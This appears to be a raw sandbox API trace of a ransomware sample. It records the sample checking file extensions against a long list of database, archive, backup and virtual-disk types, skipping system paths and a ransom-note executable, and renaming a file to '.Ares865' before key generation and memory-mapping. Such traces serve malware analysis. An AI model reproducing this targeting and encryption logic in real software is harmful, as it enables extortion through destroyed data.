lstrcmpiW (lpString1="32.bmp", lpString2="dacpac") returned -1 [0085.174] lstrlenW (lpString="dad") returned 3 [0085.174] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.174] lstrlenW (lpString="dadiagrams") returned 10 [0085.174] lstrcmpiW (lpString1="tile32.bmp", lpString2="dadiagrams") returned 1 [0085.174] lstrlenW (lpString="daschema") returned 8 [0085.174] lstrcmpiW (lpString1="le32.bmp", lpString2="daschema") returned 1 [0085.174] lstrlenW (lpString="db-journal") returned 10 [0085.174] lstrcmpiW (lpString1="tile32.bmp", lpString2="db-journal") returned 1 [0085.174] lstrlenW (lpString="db-shm") returned 6 [0085.174] lstrcmpiW (lpString1="32.bmp", lpString2="db-shm") returned -1 [0085.174] lstrlenW (lpString="db-wal") returned 6 [0085.174] lstrcmpiW (lpString1="32.bmp", lpString2="db-wal") returned -1 [0085.174] lstrlenW (lpString="dbc") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.175] lstrlenW (lpString="dbs") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.175] lstrlenW (lpString="dbt") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.175] lstrlenW (lpString="dbv") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.175] lstrlenW (lpString="dbx") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.175] lstrlenW (lpString="dcb") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.175] lstrlenW (lpString="dct") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.175] lstrlenW (lpString="dcx") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.175] lstrlenW (lpString="ddl") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.175] lstrlenW (lpString="dlis") returned 4 [0085.175] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.175] lstrlenW (lpString="dp1") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.175] lstrlenW (lpString="dqy") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.175] lstrlenW (lpString="dsk") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.175] lstrlenW (lpString="dsn") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.175] lstrlenW (lpString="dtsx") returned 4 [0085.175] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.175] lstrlenW (lpString="dxl") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.175] lstrlenW (lpString="eco") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.175] lstrlenW (lpString="ecx") returned 3 [0085.175] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.175] lstrlenW (lpString="edb") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.176] lstrlenW (lpString="epim") returned 4 [0085.176] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.176] lstrlenW (lpString="fcd") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.176] lstrlenW (lpString="fdb") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.176] lstrlenW (lpString="fic") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.176] lstrlenW (lpString="flexolibrary") returned 12 [0085.176] lstrcmpiW (lpString1="ertile32.bmp", lpString2="flexolibrary") returned -1 [0085.176] lstrlenW (lpString="fm5") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.176] lstrlenW (lpString="fmp") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.176] lstrlenW (lpString="fmp12") returned 5 [0085.176] lstrcmpiW (lpString1="2.bmp", lpString2="fmp12") returned -1 [0085.176] lstrlenW (lpString="fmpsl") returned 5 [0085.176] lstrcmpiW (lpString1="2.bmp", lpString2="fmpsl") returned -1 [0085.176] lstrlenW (lpString="fol") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.176] lstrlenW (lpString="fp3") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.176] lstrlenW (lpString="fp4") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.176] lstrlenW (lpString="fp5") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.176] lstrlenW (lpString="fp7") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.176] lstrlenW (lpString="fpt") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.176] lstrlenW (lpString="frm") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.176] lstrlenW (lpString="gdb") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.176] lstrlenW (lpString="gdb") returned 3 [0085.176] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.176] lstrlenW (lpString="grdb") returned 4 [0085.177] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.177] lstrlenW (lpString="gwi") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.177] lstrlenW (lpString="hdb") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.177] lstrlenW (lpString="his") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.177] lstrlenW (lpString="ib") returned 2 [0085.177] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.177] lstrlenW (lpString="idb") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.177] lstrlenW (lpString="ihx") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.177] lstrlenW (lpString="itdb") returned 4 [0085.177] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.177] lstrlenW (lpString="itw") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.177] lstrlenW (lpString="jet") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.177] lstrlenW (lpString="jtx") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.177] lstrlenW (lpString="kdb") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.177] lstrlenW (lpString="kexi") returned 4 [0085.177] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.177] lstrlenW (lpString="kexic") returned 5 [0085.177] lstrcmpiW (lpString1="2.bmp", lpString2="kexic") returned -1 [0085.177] lstrlenW (lpString="kexis") returned 5 [0085.177] lstrcmpiW (lpString1="2.bmp", lpString2="kexis") returned -1 [0085.177] lstrlenW (lpString="lgc") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.177] lstrlenW (lpString="lwx") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.177] lstrlenW (lpString="maf") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.177] lstrlenW (lpString="maq") returned 3 [0085.177] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.178] lstrlenW (lpString="mar") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.178] lstrlenW (lpString="marshal") returned 7 [0085.178] lstrcmpiW (lpString1="e32.bmp", lpString2="marshal") returned -1 [0085.178] lstrlenW (lpString="mas") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.178] lstrlenW (lpString="mav") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.178] lstrlenW (lpString="maw") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.178] lstrlenW (lpString="mdbhtml") returned 7 [0085.178] lstrcmpiW (lpString1="e32.bmp", lpString2="mdbhtml") returned -1 [0085.178] lstrlenW (lpString="mdn") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.178] lstrlenW (lpString="mdt") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.178] lstrlenW (lpString="mfd") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.178] lstrlenW (lpString="mpd") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.178] lstrlenW (lpString="mrg") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.178] lstrlenW (lpString="mud") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.178] lstrlenW (lpString="mwb") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.178] lstrlenW (lpString="myd") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.178] lstrlenW (lpString="ndf") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.178] lstrlenW (lpString="nnt") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.178] lstrlenW (lpString="nrmlib") returned 6 [0085.178] lstrcmpiW (lpString1="32.bmp", lpString2="nrmlib") returned -1 [0085.178] lstrlenW (lpString="ns2") returned 3 [0085.178] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.179] lstrlenW (lpString="ns3") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.179] lstrlenW (lpString="ns4") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.179] lstrlenW (lpString="nsf") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.179] lstrlenW (lpString="nv") returned 2 [0085.179] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.179] lstrlenW (lpString="nv2") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.179] lstrlenW (lpString="nwdb") returned 4 [0085.179] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.179] lstrlenW (lpString="nyf") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.179] lstrlenW (lpString="odb") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.179] lstrlenW (lpString="odb") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.179] lstrlenW (lpString="oqy") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.179] lstrlenW (lpString="ora") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.179] lstrlenW (lpString="orx") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.179] lstrlenW (lpString="owc") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.179] lstrlenW (lpString="p96") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.179] lstrlenW (lpString="p97") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.179] lstrlenW (lpString="pan") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.179] lstrlenW (lpString="pdb") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.179] lstrlenW (lpString="pdm") returned 3 [0085.179] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.179] lstrlenW (lpString="pnz") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.180] lstrlenW (lpString="qry") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.180] lstrlenW (lpString="qvd") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.180] lstrlenW (lpString="rbf") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.180] lstrlenW (lpString="rctd") returned 4 [0085.180] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.180] lstrlenW (lpString="rod") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.180] lstrlenW (lpString="rodx") returned 4 [0085.180] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.180] lstrlenW (lpString="rpd") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.180] lstrlenW (lpString="rsd") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.180] lstrlenW (lpString="sas7bdat") returned 8 [0085.180] lstrcmpiW (lpString1="le32.bmp", lpString2="sas7bdat") returned -1 [0085.180] lstrlenW (lpString="sbf") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.180] lstrlenW (lpString="scx") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.180] lstrlenW (lpString="sdb") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.180] lstrlenW (lpString="sdc") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.180] lstrlenW (lpString="sdf") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.180] lstrlenW (lpString="sis") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.180] lstrlenW (lpString="spq") returned 3 [0085.180] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.180] lstrlenW (lpString="te") returned 2 [0085.180] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.180] lstrlenW (lpString="teacher") returned 7 [0085.180] lstrcmpiW (lpString1="e32.bmp", lpString2="teacher") returned -1 [0085.180] lstrlenW (lpString="tmd") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.181] lstrlenW (lpString="tps") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.181] lstrlenW (lpString="trc") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.181] lstrlenW (lpString="trc") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.181] lstrlenW (lpString="trm") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.181] lstrlenW (lpString="udb") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.181] lstrlenW (lpString="udl") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.181] lstrlenW (lpString="usr") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.181] lstrlenW (lpString="v12") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.181] lstrlenW (lpString="vis") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.181] lstrlenW (lpString="vpd") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.181] lstrlenW (lpString="vvv") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.181] lstrlenW (lpString="wdb") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.181] lstrlenW (lpString="wmdb") returned 4 [0085.181] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.181] lstrlenW (lpString="wrk") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.181] lstrlenW (lpString="xdb") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.181] lstrlenW (lpString="xld") returned 3 [0085.181] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.181] lstrlenW (lpString="xmlff") returned 5 [0085.181] lstrcmpiW (lpString1="2.bmp", lpString2="xmlff") returned -1 [0085.181] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.Ares865") returned 90 [0085.182] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp.ares865"), dwFlags=0x1) returned 1 [0085.184] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.184] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.184] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.185] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.185] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.185] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.187] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.192] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.193] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.193] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.194] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.194] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.194] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.194] CloseHandle (hObject=0x15c) returned 1 [0085.194] CloseHandle (hObject=0x118) returned 1 [0085.194] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.194] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.194] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.195] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4b0a44, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4b0a44, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd4482cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile33.bmp", cAlternateFileName="")) returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="aoldtz.exe") returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2=".") returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="..") returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="windows") returned -1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="bootmgr") returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="temp") returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="pagefile.sys") returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="boot") returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="ids.txt") returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="ntuser.dat") returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="perflogs") returned 1 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2="MSBuild") returned 1 [0085.195] lstrlenW (lpString="usertile33.bmp") returned 14 [0085.195] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned 82 [0085.195] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile33.bmp" | out: lpString1="usertile33.bmp") returned="usertile33.bmp" [0085.195] lstrlenW (lpString="usertile33.bmp") returned 14 [0085.195] lstrlenW (lpString="Ares865") returned 7 [0085.195] lstrcmpiW (lpString1="e33.bmp", lpString2="Ares865") returned 1 [0085.195] lstrlenW (lpString=".dll") returned 4 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2=".dll") returned 1 [0085.195] lstrlenW (lpString=".lnk") returned 4 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2=".lnk") returned 1 [0085.195] lstrlenW (lpString=".ini") returned 4 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2=".ini") returned 1 [0085.195] lstrlenW (lpString=".sys") returned 4 [0085.195] lstrcmpiW (lpString1="usertile33.bmp", lpString2=".sys") returned 1 [0085.195] lstrlenW (lpString="usertile33.bmp") returned 14 [0085.195] lstrlenW (lpString="bak") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.196] lstrlenW (lpString="ba_") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.196] lstrlenW (lpString="dbb") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.196] lstrlenW (lpString="vmdk") returned 4 [0085.196] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.196] lstrlenW (lpString="rar") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.196] lstrlenW (lpString="zip") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.196] lstrlenW (lpString="tgz") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.196] lstrlenW (lpString="vbox") returned 4 [0085.196] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.196] lstrlenW (lpString="vdi") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.196] lstrlenW (lpString="vhd") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.196] lstrlenW (lpString="vhdx") returned 4 [0085.196] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.196] lstrlenW (lpString="avhd") returned 4 [0085.196] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.196] lstrlenW (lpString="db") returned 2 [0085.196] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.196] lstrlenW (lpString="db2") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.196] lstrlenW (lpString="db3") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.196] lstrlenW (lpString="dbf") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.196] lstrlenW (lpString="mdf") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.196] lstrlenW (lpString="mdb") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.196] lstrlenW (lpString="sql") returned 3 [0085.196] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.196] lstrlenW (lpString="sqlite") returned 6 [0085.197] lstrcmpiW (lpString1="33.bmp", lpString2="sqlite") returned -1 [0085.197] lstrlenW (lpString="sqlite3") returned 7 [0085.197] lstrcmpiW (lpString1="e33.bmp", lpString2="sqlite3") returned -1 [0085.197] lstrlenW (lpString="sqlitedb") returned 8 [0085.197] lstrcmpiW (lpString1="le33.bmp", lpString2="sqlitedb") returned -1 [0085.197] lstrlenW (lpString="xml") returned 3 [0085.197] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.197] lstrlenW (lpString="$er") returned 3 [0085.197] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.197] lstrlenW (lpString="4dd") returned 3 [0085.197] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.197] lstrlenW (lpString="4dl") returned 3 [0085.197] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.197] lstrlenW (lpString="^^^") returned 3 [0085.197] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.197] lstrlenW (lpString="abs") returned 3 [0085.197] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.197] lstrlenW (lpString="abx") returned 3 [0085.197] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.197] lstrlenW (lpString="accdb") returned 5 [0085.197] lstrcmpiW (lpString1="3.bmp", lpString2="accdb") returned -1 [0085.197] lstrlenW (lpString="accdc") returned 5 [0085.197] lstrcmpiW (lpString1="3.bmp", lpString2="accdc") returned -1 [0085.197] lstrlenW (lpString="accde") returned 5 [0085.197] lstrcmpiW (lpString1="3.bmp", lpString2="accde") returned -1 [0085.197] lstrlenW (lpString="accdr") returned 5 [0085.197] lstrcmpiW (lpString1="3.bmp", lpString2="accdr") returned -1 [0085.197] lstrlenW (lpString="accdt") returned 5 [0085.197] lstrcmpiW (lpString1="3.bmp", lpString2="accdt") returned -1 [0085.197] lstrlenW (lpString="accdw") returned 5 [0085.197] lstrcmpiW (lpString1="3.bmp", lpString2="accdw") returned -1 [0085.197] lstrlenW (lpString="accft") returned 5 [0085.197] lstrcmpiW (lpString1="3.bmp", lpString2="accft") returned -1 [0085.197] lstrlenW (lpString="adb") returned 3 [0085.197] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.197] lstrlenW (lpString="adb") returned 3 [0085.197] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.198] lstrlenW (lpString="ade") returned 3 [0085.198] 